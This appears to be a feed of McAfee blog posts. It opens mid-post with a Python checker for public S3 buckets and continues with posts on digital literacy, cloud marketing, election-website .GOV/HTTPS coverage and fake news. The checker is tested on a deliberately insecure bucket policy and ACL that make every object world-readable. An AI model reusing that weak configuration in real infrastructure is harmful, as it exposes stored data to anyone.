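    as aws:SourceVpc may narrow them, but that needs a human to confirm."""
    stmts = policy.get("Statement", [])
    if isinstance(stmts, dict):          # policy grammar allows a bare object
        stmts = [stmts]
    return [st.get("Sid", "<no Sid>") for st in stmts
            if st.get("Effect") == "Allow"
            and _principal_is_public(st.get("Principal"))]


def public_acl_grants(acl: dict) -> list:
    """Return permissions the ACL grants to AllUsers/AuthenticatedUsers."""
    return [g["Permission"] for g in acl.get("Grants", [])
            if g.get("Grantee", {}).get("Type") == "Group"
            and g["Grantee"].get("URI") in PUBLIC_ACL_GRANTEES]


def block_public_access_complete(cfg: dict) -> bool:
    """True only when all four Block Public Access switches are on."""
    keys = ("BlockPublicAcls", "IgnorePublicAcls",
            "BlockPublicPolicy", "RestrictPublicBuckets")
    return all(cfg.get(k) is True for k in keys)


def assess_bucket(policy: dict, acl: dict, bpa: dict) -> dict:
    """Combine the three checks into one verdict for a bucket."""
    return {
        "public_policy_sids": public_policy_statements(policy),
        "public_acl_permissions": public_acl_grants(acl),
        "block_public_access_complete": block_public_access_complete(bpa),
    }


# Constructed weak settings: a policy that makes every object world-readable,
# an ACL that grants READ to everyone, and Block Public Access switched off.
WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
    "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"
  }]
}""")
WEAK_ACL = {"Grants": [{"Grantee": {"Type": "Group",
            "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
            "Permission": "READ"}]}
WEAK_BPA = {"BlockPublicAcls": False, "IgnorePublicAcls": False,
            "BlockPublicPolicy": False, "RestrictPublicBuckets": False}

# Corrected settings: access limited to one role in a placeholder account,
# an owner-only ACL, and all four Block Public Access switches on.
FIXED_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Sid": "RoleRead", "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
    "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}]}
FIXED_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"},
             "Permission": "FULL_CONTROL"}]}
FIXED_BPA = {k: True for k in WEAK_BPA}

if __name__ == "__main__":
    print("weak :", assess_bucket(WEAK_POLICY, WEAK_ACL, WEAK_BPA))
    print("fixed:", assess_bucket(FIXED_POLICY, FIXED_ACL, FIXED_BPA))
```

In a live account the three inputs would come from the bucket's policy, ACL and public-access-block settings respectively; the logic stays the same, which is the point of the row in the model that the provider supplies the switch and the enterprise has to flip it.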
The paper discusses all of this in detail and suggests ideas and technologies to address each row – just like renting a car, you need to address every row to be secure.

The post Cloud Security is like Renting a Car! appeared first on McAfee Blogs.

]]>
7 Conversations to Help Build Up Your Family’s Digital Literacy Skills https://www.mcafee.com/blogs/consumer/family-safety/7-conversations-to-help-develop-your-familys-digital-literacy-iq/ https://www.mcafee.com/blogs/consumer/family-safety/7-conversations-to-help-develop-your-familys-digital-literacy-iq/#respond Sat, 08 Feb 2020 17:00:27 +0000 /blogs/?p=98506


]]>

With the surge of misleading content online, helping your child learn to become an independent thinker is no small task.

While schools have been charged with developing students’ digital literacy skills, parents also have a role in consistently sparking deeper thinking when navigating digital environments.

The sharper a child’s digital literacy skills, the more quickly he or she can identify biased agendas and deceptive content and form thoughts, insights, and opinions independently of the digital crowd think.

Here are a few conversations to focus kids on building up digital literacy skills.

7 conversations to build digital literacy skills

  1. Grow visual literacy. The world expresses itself through media today, which makes visual literacy (the ability to interpret art and media content) another must-have skill for kids. According to recent reports, Snapchat has 10 billion video views a day, Facebook video 8 billion views a day, and YouTube video 5 billion views. Instagram reports its users upload 25 million photos every day. This visual tsunami increases the chances your child will encounter deep fakes (AI-enhanced video) and malicious memes (false information placed on photos) designed to manipulate public opinion. Discuss: Learn ways to spot deep fakes with your kids (stray hairs, no blinking, eye movement, etc.). Additional resource: Watch and discuss this video and read the post Can You Spot a Deepfake? from LifeHacker with your family.
  2. Search with care. Search engines scan the web and bring up relevant content. However, not all that content is credible. Understanding a search engine’s function is essential, especially when your child is researching a paper and evaluating other content. Search engines rank by keywords, not content accuracy. Ask: Is this content credible and supported by legitimate sources? Is it presented as humor or an opinion piece? Is the URL authentic and trustworthy? Additional Resource: Common Sense Media’s video Smart Online Search Tips.
  3. Protect, respect privacy. Kids, fueled by emotion and impulse, often move around online with little thought to personal privacy or the privacy of others. Discuss: Talk about the basics often: Where are the privacy gaps in our technology? Where are there privacy gaps in my behavior? How can we create strong passwords? Are my privacy settings current? Do I have personal details in public view, either on profile info or in my posts? The other side of privacy: Respect friends’ privacy by asking permission to post photos, keeping personal secrets, and never sharing personal details or circumstances of another person in the online space.
  4. Recognize and respect points of view. The web is a big place with an ocean filled with different points of view. Part of becoming digitally literate is learning how to listen to and respect the opinions of others. Exercising this skill is essential to building empathy, eliminating cyberbullying and online shaming, and becoming a positive voice in the online space. Additional resource: Discuss Dr. Michele Borba’s blog post, 9 Habits of Empathetic Children.
  5. Always attribute content. The internet is a big place that showcases a variety of exciting, valuable, original content. However, that content doesn’t display a visible price tag. Therefore, great content is often re-shared without giving credit to the author or creator. Discuss: Talk about the value of a person’s art, writing, photos, and research. Find examples of how to correctly cite sources and share them with your child. Follow up by checking your child’s social feeds to see that sources are being cited correctly. Coach them to add attribution when needed. Additional resource: Go through this free, 5-day course for families from CyberWise on Digital Citizenship.
  6. Always consider your digital footprint. A digital footprint is anywhere we’ve personally connected online. These small digital breadcrumbs — when added together and viewed as a whole — are what others see, and consequently, believe about us. The parts of our footprint include social profiles we create, comments we leave, tweets, photos, or any time others mention us online. Ask: Is this photo something that will add or subtract value from my digital footprint? Will this post, photo, or tweet affect my chances of getting into college or competing for a job? Will I be proud of this post five years from now? Additional Resource: Author Sue Scheff’s blog post Online Reputation Reboot for Teens.
  7. Stay current with new technology. Adults, even more than kids, need to make a larger commitment to new technology. Part of digital literacy is keeping up with current technology and preparing for future technology. By making this learning investment, we can better understand the origin of new technologies such as AI and spinoff trends such as deep fakes. Educating ourselves on the nuances of tools such as vlogs, audio, video, AR, AI, 3D printing, and machine learning is essential to navigating the current and future landscape. Additional resources: Consider subscribing to online magazines to get you rolling: TechCrunch.com, TheNextWeb.com, DigitalTrends.com.

Like other areas that require time and consistency to develop, your child’s digital literacy skills will take time to mature. Author Tim Elmore says on his Growing Leaders blog that when it comes to raising kids to thrive in the digital era, a parent’s role is clear: “We must clearly convey values and virtues like resilience, discipline, integrity, problem-solving skills, good communication, commitment, and responsibility. That’s the critical role we can play.”

So, have fun with these conversations, always recognizing that your influence matters. Look for real-life digital literacy examples to talk about, and don’t forget to celebrate the wins you see your kids achieving online.

The post 7 Conversations to Help Build Up Your Family’s Digital Literacy Skills appeared first on McAfee Blogs.

]]>
Leading with Cloud Security, Empowering Enterprise Innovation https://www.mcafee.com/blogs/enterprise/cloud-security/leading-with-cloud-security-empowering-enterprise-innovation/ https://www.mcafee.com/blogs/enterprise/cloud-security/leading-with-cloud-security-empowering-enterprise-innovation/#respond Thu, 06 Feb 2020 16:43:47 +0000 /blogs/?p=98462


]]>

Call it ancient history—2012. When sanctioned apps ruled the day. Shadow IT lurked, well, in the shadows. And protecting the enterprise meant locking down the cloud. Then, true to the principles of Darwinian evolution, enterprises began to adapt to the new natural order.

Let the record show, 97% of enterprises in 2020 rely on the cloud for some combination of SaaS, IaaS, or PaaS solutions to power their enterprise. Which is why McAfee’s cloud-led strategy to serve the enterprise is centered on an organization’s ability to protect data and workloads, whether in use, in motion, or at rest. President and CEO of McAfee, Peter Leav, puts it this way, “We are in a new world. There is simply more. More networks, more endpoints, more users, more applications, more data, more cloud.”

SaaS solutions make the enterprise agile, whether via collaboration tools like Slack or Box, relationship management and marketing automation technologies like Salesforce, or technical management from companies like ServiceNow. Agility is the name of the game, and the enterprise that moves fastest wins the day. And with IaaS and PaaS enabled by the likes of AWS, Microsoft Azure, and Google Cloud Platform, the evolution of the enterprise only accelerates.

McAfee is proud to lead at the front of the cloud revolution. Our award-winning MVISION Cloud created the Cloud Access Security Broker (CASB) category nearly a decade ago. And we’ve only built on our successes in the cloud from there, including 14 seminal patents (3X more than our nearest competitor). The analyst community agrees—it’s gratifying to be named a Leader in reports by three influential analyst firms.

We built on our leadership in 2019 when McAfee acquired NanoSec, an innovator in zero-trust application visibility and security for multi-cloud environments. NanoSec enables organizations to secure applications once and run them on any cloud infrastructure at scale. But there’s more. NanoSec also provides McAfee cloud users the latest in container security. When you add NanoSec’s capabilities to McAfee’s existing cloud security portfolio, you can see that we now bring consistent data security, threat protection, governance, and compliance to virtually every element and every environment of the cloud.

Further proof of our cloud-led momentum unfolded in 2019 as MVISION Cloud was certified as a natively-integrated cloud solution for consumers, businesses, and governments by global leaders in the IaaS and PaaS arena. Specifically, McAfee was recognized by AWS as a Well-Architected Partner for our CASB and IPS solutions, as well as a Security Competency Partner for CASB, all to offer the same security controls available in a private data center. What’s more, AWS called out McAfee as an ISV Accelerator Partner for CASB, and an Amazon RDS Partner for McAfee Database Security. Microsoft likewise recognized our CASB leadership with its integration of MVISION Cloud with MS Teams. Microsoft and McAfee also partner through Office 365 Collaboration Controls to ensure security and compliance, and our virtual Advanced Threat Defense is on the Azure Marketplace. In November, Google Cloud Platform (GCP) announced MVISION Cloud’s integration into GCP for visibility and control of cloud resources. And McAfee is trusted by the U.S. government as a FedRAMP Moderate Authorized and FedRAMP Ready for FedRAMP High partner via our MVISION Cloud, Extended Threat Protection, Cloud Value Maturity, and End User Remediation solutions. We also enjoy FedRAMP Moderate In-Process status for MVISION Endpoint on the FedRAMP Marketplace.

Still, as rewarding as it is to be recognized by partners like AWS, MS, GCP, and FedRAMP, our customers’ successes are the real story. WEG is a perfect example. The multi-national manufacturing company headquartered in Brazil currently deploys McAfee® Client Proxy, McAfee® MVISION Cloud for Office 365, McAfee® Web Gateway, and McAfee® Web Gateway Cloud Service. This unified approach to cloud helps address WEG’s three biggest cybersecurity concerns, namely secure internet access, secure cloud access, and secure intellectual property. Pierre Pereira Rodrigues, CISO for WEG, puts it this way, “Our business users have been pushing for greater cloud adoption. Rather than wearing the ‘No, you can’t’ cybersecurity hat, we strive to say, ‘Let’s figure out how you can.’” The result is proof that a business can be innovative and not sacrifice security.

Maka Guerrero, Senior IT Security Analyst at Pacific Dental Services says, “MVISION Cloud allows us to have more flexibility on the fly than any other CASB on the market. The approach that McAfee is taking to secure the cloud aligns really well with our other partners like AWS and what they are trying to achieve, and it makes sense for our business goals.” A provider of administrative support to dental offices across the U.S., PDS deploys MVISION Cloud for AWS, MVISION Cloud for Box, MVISION Cloud for Custom Apps, MVISION Cloud for Office 365, MVISION Cloud for Salesforce, and MVISION Cloud for Shadow IT.

It’s customers like these—frontline defenders of this new digital age—who are writing tomorrow’s history, today. McAfee is proud to stand at their side even as our adversary pushes the limits of an equally Darwinian transformation of the threatscape.

With the scale, speed, and agility of the cloud on our side, let the new world continue to evolve.

The post Leading with Cloud Security, Empowering Enterprise Innovation appeared first on McAfee Blogs.

]]>
McAfee’s Women in Security Offer New Grads Career Insights https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafees-women-in-security-offer-new-grads-career-insights/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafees-women-in-security-offer-new-grads-career-insights/#respond Thu, 06 Feb 2020 15:00:55 +0000 /blogs/?p=98447


]]>

Launching your career is an exciting milestone, though one that can also be nerve-wracking. Chances are questions like “What should I look for in a company?” or “How do I become a leader?” have crossed your mind.

While we can’t answer all your questions, our Women in Security (WISE) employee resource group offered to host a panel discussion to encourage the next generation of women in tech to pursue their passions. Students asked questions about what it’s like to work in the technology industry, the importance of mentorship, overcoming imposter syndrome, achieving success early in their careers, and life here at McAfee.

Here’s how they responded:

How did you build success early in your career?

Amanda, Data Scientist: “I quickly found that learning never stops. While a degree helps you build the foundation, real knowledge comes from exposure and experience. Take every challenge and opportunity thrown your way. Early in your career is the best time to take risks and just say yes.”

Flavia, IT Manager: “In everything I do, I keep three principles at the forefront: communication, awareness, and accountability. If you have these skills, you will succeed at any role.”

JoAnne, Cloud Application Engineer: “When it’s early in your career, you can build success by trying new tasks outside of your normal job duties. Do your best and take advantage of each opportunity. And remember, have fun along the way.”

How do you handle imposter syndrome?

Bolade, Sales Engineer: “Everyone faces self-doubt. As a woman, and a woman of a diverse background, I’ve faced imposter syndrome. You must fight through it and recognize that it’s only the voice in your head. To help you silence the doubt, reach out to your network and your mentor. Mentorship is an important part in building your confidence.”

Crystal, Talent Enablement Leader: “First, recognize that any negative thoughts are just that—thoughts. Acknowledge them and then instead of letting them make you feel unqualified, use them to empower you. Take action to fill any areas of improvement. You will face adversity in your career, but take them as lessons learned, gain perspective, and then move forward.”

How do you chart a path to leadership?

Crystal, Talent Enablement Leader: “Take time to research the role you want to be in. What will it take to get there? Know it’s not always a linear path though. It’s okay to take steps backwards or sideways when they help you achieve your long-term plan. Humble yourself for the journey.”

Sonia, Sr. Product Marketing Manager: “Start with a vision board and work towards the small wins to help you reach your goals. Also, keep in mind research tells us men and women approach opportunities differently. As women, we wait until we feel 100 percent qualified for the job, while men apply believing they will learn on the job. My advice to all women seeking any role and leadership is to just go for it—you are capable. Recognizing you can and will learn on the job is an important part of your success.”

Why McAfee?

Bolade, Sales Engineer: “The people. Not long after I started at McAfee, I took on another important role—motherhood. My leadership was incredibly supportive and when I returned from leave, I was promoted within six months. You can’t get where you want to be without good people to help you get there. I’ve found the supportive team I have at McAfee is critical to my fulfilment both personally and professionally.”

Sonia, Sr. Product Marketing Manager: “Here, I feel like I have family. I love how everyone always exchanges hellos in the elevator. Something small like this makes a big difference in your day. Working with a great team in a great environment is one of the most important things that helps you succeed, and I’ve found that at McAfee.”

Interested in building your career at a company that helps women thrive? Search our openings!

The post McAfee’s Women in Security Offer New Grads Career Insights appeared first on McAfee Blogs.

]]>
Election Website Security: Protect Your Vote in 2020 https://www.mcafee.com/blogs/consumer/election-website-security/ https://www.mcafee.com/blogs/consumer/election-website-security/#respond Tue, 04 Feb 2020 05:01:43 +0000 /blogs/?p=98296


]]>

The 2020 U.S. presidential primaries are right around the corner. As people gear up to cast their ballots for party candidates, they may not realize that website security shortcomings could leave the U.S. elections susceptible to digital disinformation campaigns, or possibly worse, seeking to influence and/or manipulate the democratic process.

McAfee recently conducted a survey of county websites and county election administration websites in the 13 states projected as battleground or “tossup” states in the U.S. presidential elections in November. According to the survey results, the majority of these websites lacked official U.S. government .GOV website validation and HTTPS website security measures to prevent hackers from launching fake websites disguised as legitimate county government sites.

Got .GOV?

You might be wondering what the significance of a .gov website domain is. Well, a .gov website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

On the other hand, a website using a .COM, .NET, .ORG, or .US can be purchased by anyone with a credit card from any number of legitimate website domain vendors. The lack of a .GOV in a website name means that no controlling government authority has validated that the website is a legitimate government site.

HTTPS: browse the web securely

In the same vein as a .GOV web domain, HTTPS and a lock icon in the address bar of a website help establish its validity. When a visitor sees these icons, it means that their browser has made a secure connection with the website, so the website and the user can be confident of who they are sharing information with.

This means that any personal voter registration information that a user shares with the site cannot be intercepted and stolen by hackers while they are on the site. Additionally, HTTPS and a lock icon tell the user that they cannot be re-routed without their knowledge to a different site.

How this could impact elections

Hackers typically look to carry out their attacks with the least amount of effort and the fewest resources. Instead of hacking into local voting systems and changing vote counts, hackers could conduct a digital disinformation campaign to influence voter behavior during the elections. These attacks would seek to suppress or disrupt the voting process by setting up bogus websites with official sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.

Example disinformation email:

On top of that, social media promotions could be used to lure voters to the fake websites and provide them with the same false information.

By telling voters that they should register to vote in the wrong places, or merely vote at the wrong times, the hackers could misdirect, confuse, and frustrate voters on election day. This could ultimately impact vote counts or at least undermine voter confidence in the electoral process.

Survey results

McAfee’s survey of the external security measures for county election websites included Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

Our research found that Minnesota and Texas ranked the lowest among the surveyed states in terms of .GOV county coverage with 4.6% and 5.1% coverage respectively. Arizona ranked the highest in .GOV county coverage with 66.7%. Yet, this still left a third of the state’s counties uncovered.

Texas ranked the lowest in terms of HTTPS protection with only 22.8% of its county websites protected. Arizona again led in county HTTPS protection with 80.0%, followed by Nevada (75.0%), Iowa (70.7%), Michigan (65.1%), and Wisconsin (63.9%). Again, these “leader” states still lacked HTTPS coverage for approximately a third of their counties.

Tips to help secure your vote

So, what can citizens do to help protect their votes and the electoral system overall leading up to the 2020 election? Check out these tips to securely cast your ballot:

  • Stay informed. Remind yourself to confirm that the site you are visiting is a .GOV website and that HTTPS security protection is in place, to ensure that the information is accurate and safe.
  • Look out for suspicious emails. Carefully scrutinize all election-related emails. An attacker seeking to misinform can use phishing techniques to accomplish their objective. McAfee’s general warnings about phishing emails (e.g. here), in which an attacker crafts emails that look as if they come from legitimate sources, apply here as well.
  • Go directly to the source. If in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day.
  • Keep it old school. Trust the official voting literature sent through the traditional mail first, as the U.S. Postal Service is the primary channel state and local governments use to send out voting information.

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election Website Security: Protect Your Vote in 2020 appeared first on McAfee Blogs.

U.S. Battleground County Website Security Survey
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/u-s-battleground-county-website-security-survey/
Tue, 04 Feb 2020 05:00:57 +0000

Today McAfee released the results of a survey of county websites and county election administration websites in the 13 states projected as battleground states in the 2020 U.S. presidential elections. We found that significant majorities of these websites lacked the official government .GOV website validation and HTTPS website security measures to prevent malicious actors from launching copycat web domains posing as legitimate county government sites.

These shortcomings could make it possible for malicious actors to spread false and misleading election information through mass bulk email and website promotion campaigns that could suppress, misdirect, or otherwise disrupt Election Day proceedings in such a way that they could impact the number of votes cast and, ultimately, perhaps impact the results of the 2020 U.S. elections.

Why .GOV & HTTPS?

Whereas websites using .COM, .NET, .ORG, and .US in their names are easily accessible to anyone with a credit card from website domain vendors such as GoDaddy.com, acquiring a .GOV website name requires that buyers submit evidence to the U.S. government that they truly are buying these names on behalf of legitimate local, county, or state government entities.

The lack of .gov in a website name means that no controlling government authority has validated that the website in question is legitimate.

When website visitors see the HTTPS and a lock icon in the address of a website they are visiting, this means that their browser has made a secure connection with that website through a technology called Secure Sockets Layer (SSL). While SSL sounds technical, the security it delivers is easy to understand. These signifiers simply tell visitors that any personal voter registration information that they share with those websites is encrypted and cannot be intercepted and stolen by hackers while they are visiting the site.

Additionally, and more importantly to the election disinformation issue, they also tell visitors that they cannot be re-routed against their will from legitimate government websites to other websites pretending to be government websites.

What McAfee’s survey found

McAfee’s January 2020 survey researched states projected by U.S. election prognosticators to be pivotal in determining the victor in the 2020 Presidential Elections. States surveyed include Arizona, Florida, Georgia, Iowa, Michigan, Minnesota, Nevada, New Hampshire, North Carolina, Ohio, Pennsylvania, Texas, and Wisconsin. Together, these states account for 201 of the 270 electoral votes required to win the U.S. presidential election.

State counties lacking .GOV validation

Of the 1,117 counties in the survey group, 83.3% of their websites lack .GOV validation. Minnesota ranked the lowest among the surveyed states in terms of .GOV website validation with 95.4% of counties lacking U.S. government certification. Other states severely lacking in .GOV coverage included Texas (94.9%), New Hampshire (90.0%), Michigan (89.2%), Iowa (88.9%), Nevada (87.5%), and Pennsylvania (83.6%).

Arizona had the highest percentage of main county websites validated by .GOV with 66.7% coverage, but even this percentage suggests that a third of the Grand Canyon State’s county websites are unvalidated and that hundreds of thousands of voters could still be subjected to disinformation schemes.

State counties lacking HTTPS protection

McAfee’s survey found that 46.6% of county websites lack HTTPS encryption. Texas ranked the lowest in terms of encryption with 77.2% of its county websites failing to protect citizens visiting these web properties. Other states with counties lacking in encryption included Pennsylvania (46.3%), Minnesota (42.5%), and Georgia (38.4%).

Assessment of Iowa and New Hampshire

In Iowa, 88.9% of county websites lack .GOV validation, and as many as 29.3% lack HTTPS encryption. Ninety percent of New Hampshire’s county websites lack .GOV validation, and as many as 30% of the Granite State’s counties lack encryption.

Inconsistent naming standards

McAfee’s research found that some states attempted to establish standard naming conventions, such as www.co.[county name].[two-letter state abbreviation].us. Unfortunately, these formats were followed so inconsistently that a voter seeking election information from her county website cannot be confident that a web domain following such a convention is indeed a legitimate site.

Easy-to-remember naming formats

McAfee found 103 cases in which counties set up easy-to-remember, user-friendly domain names to make their election information easier to remember and access for the broadest possible audience of citizens. Examples include www.votedenton.com, www.votestanlycounty.com, www.carrollcountyohioelections.gov, www.voteseminole.org, and www.worthelections.com. While 93 of these counties (90.2%) protected voters visiting these sites with encryption, only two validated these special domains and websites with .GOV. This suggests that malicious parties could easily set up numerous websites with similarly named domains to spoof these legitimate sites.
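The three properties the survey scores (a .GOV name, an HTTPS address, and the www.co.[county].[st].us convention), plus the "similarly named domain" problem just described, can be checked mechanically. The script below is an added example written for this page; it is not McAfee's survey tooling and it does not reproduce the survey's data. The URL list is constructed from the domains named above plus obviously fictional placeholders, and the classification is purely offline (it reads the published URL, it does not connect to anything or validate a certificate).

```python
import re
from urllib.parse import urlsplit

# Naming convention cited in the survey: www.co.[county name].[two-letter state].us
STATE_STANDARD = re.compile(r"^(www\.)?co\.[a-z0-9-]+\.([a-z]{2})\.us$")

# Constructed sample: two real examples from the survey text plus hypothetical
# placeholders (example/sample county names, example-county.org).
SAMPLE_SITES = [
    "https://www.boe.ohio.gov/vanwert/",            # state .GOV, HTTPS
    "https://www.carrollcountyohioelections.gov",   # county .GOV, HTTPS
    "https://www.votedenton.com",                   # memorable name, no .GOV
    "http://www.co.example.tx.us",                  # follows convention, no HTTPS
    "www.co.sample.mn.us",                          # scheme omitted -> treated as http
    "http://example-county.org",                    # none of the three
]


def classify(url):
    """Apply the survey's checks to one published URL.

    gov_validated  : rightmost label is the U.S. 'gov' TLD (any depth, e.g. boe.ohio.gov)
    https          : the URL as published uses the https scheme
    state_standard : host matches www.co.<county>.<st>.us
    """
    if "://" not in url:            # bare host: assume plain http, as a browser would
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    labels = host.split(".")
    return {
        "host": host,
        "gov_validated": labels[-1] == "gov",
        "https": parts.scheme == "https",
        "state_standard": STATE_STANDARD.match(host) is not None,
    }


def coverage(urls):
    """Percent of sites lacking each protection, in the survey's style."""
    rows = [classify(u) for u in urls]
    n = len(rows)

    def pct_lacking(key):
        return round(100.0 * sum(1 for r in rows if not r[key]) / n, 1)

    return {
        "sites": n,
        "lacking_gov": pct_lacking("gov_validated"),
        "lacking_https": pct_lacking("https"),
    }


def is_lookalike(host, expected_host):
    """True unless host IS the expected site or a subdomain of it.

    The check is on the right-hand end of the name, so votedenton.com.example
    or votedenton-com.example are flagged while www.votedenton.com is not.
    """
    host = host.lower().rstrip(".")
    expected = expected_host.lower().rstrip(".")
    return not (host == expected or host.endswith("." + expected))


if __name__ == "__main__":
    for site in SAMPLE_SITES:
        print(classify(site))
    print(coverage(SAMPLE_SITES))
    print(is_lookalike("votedenton.com.example", "votedenton.com"))
```

The `https` flag only says what scheme the published address uses; whether the certificate is valid and the redirect from http to https actually happens is a separate, online check. The `.gov` test deliberately accepts any depth of subdomain, which is what makes Ohio's boe.ohio.gov per-county pages count as validated.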

.GOV and elections

The lack of .gov matters because, without an official government body validating whether websites truly belong to the government entities they claim, it’s possible for malicious actors to spoof legitimate government sites with fraudulent websites.

If a malicious foreign actor can spoof government websites, he can send hundreds of thousands of emails to voters and use both those emails and the websites to which they are tied to send voters information on the wrong polling places, phony voter registration processes or requirements (barriers), or other incorrect voting instructions that could suppress, misdirect, or otherwise disrupt a key county’s electorate from voting.

If the malicious actor can launch such a digital disinformation campaign close enough to election day, he could reach a critical mass of voters. If he does so before county and state officials become aware of the campaign, it could be very difficult for the officials to counter the disinformation before voter behavior is impacted.

If the actor can successfully disrupt the voting behavior of just tens of thousands of citizens in these key states, their votes may not be counted or their confidence in the validity of election results and even legitimacy of the democratic process overall could be badly shaken.

Ultimately, if a malicious actor seeks to undermine confidence in America’s system of government, such a digital disinformation campaign can succeed in damaging confidence in the electoral process, even if he cannot succeed in impacting actual votes.

Ohio’s Strategy for transitioning to .GOV

While only 19.3% of Ohio’s 88 county main websites have .GOV validation, the state leads McAfee’s survey with 76.1% of county election websites and webpages validated by .GOV certification.

This leadership position appears to be the result of a state-led initiative to transition county election-related content to .GOV validated web properties. A majority of counties have subsequently transitioned their main county websites to .GOV domains, their election-specific websites to .GOV domains, or their election-specific webpages to Ohio’s own .GOV-validated https://ohio.gov/ domain (i.e. https://www.boe.ohio.gov/vanwert/). See here for a complete list of Ohio county election websites.

Such a .GOV transition strategy constitutes an interim solution until more comprehensive efforts are made at the state and federal government level through initiatives such as The DOTGOV Act of 2020. This legislation would require the Department of Homeland Security (DHS) to support .GOV adoption for local governments with technical guidance and financial support.

Please see the following for more information on this subject:

The post U.S. Battleground County Website Security Survey appeared first on McAfee Blogs.

Spotting Fake News: Teaching Kids to be Responsible Online Publishers
https://www.mcafee.com/blogs/consumer/family-safety/spotting-fake-news-teaching-kids-to-be-responsible-online-publishers/
Mon, 03 Feb 2020 21:44:12 +0000
Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from?
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate?
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.com vs. cnn.com.co)?
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing a piece of content, check it out on sites like:

  • Snopes.com
  • Factcheck.com
  • Politifact.org
  • Opensecrets.org
  • Truthorfiction.com
  • Hoaxslayer.com

While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

Top 10 Cloud Privacy Recommendations for Businesses
https://www.mcafee.com/blogs/enterprise/cloud-security/top-10-cloud-privacy-recommendations-for-businesses/
Mon, 03 Feb 2020 13:00:23 +0000
In the corporate world, privacy refers to employee/business data as well as customer/supplier data—you must safeguard both of them. Laws such as CCPA and GDPR, not to mention vertical market regulations, make it clear how important this issue is to regulators, who take into account the security tools in use and their settings during investigations. (Fines can be significantly lower if tools are well deployed.)

As businesses continue to accelerate to the cloud, there’s no better time to review all aspects of cloud data collection, use, storage, transfer and processing.

  1. Investigate shadow IT, unsanctioned cloud providers and THEIR security

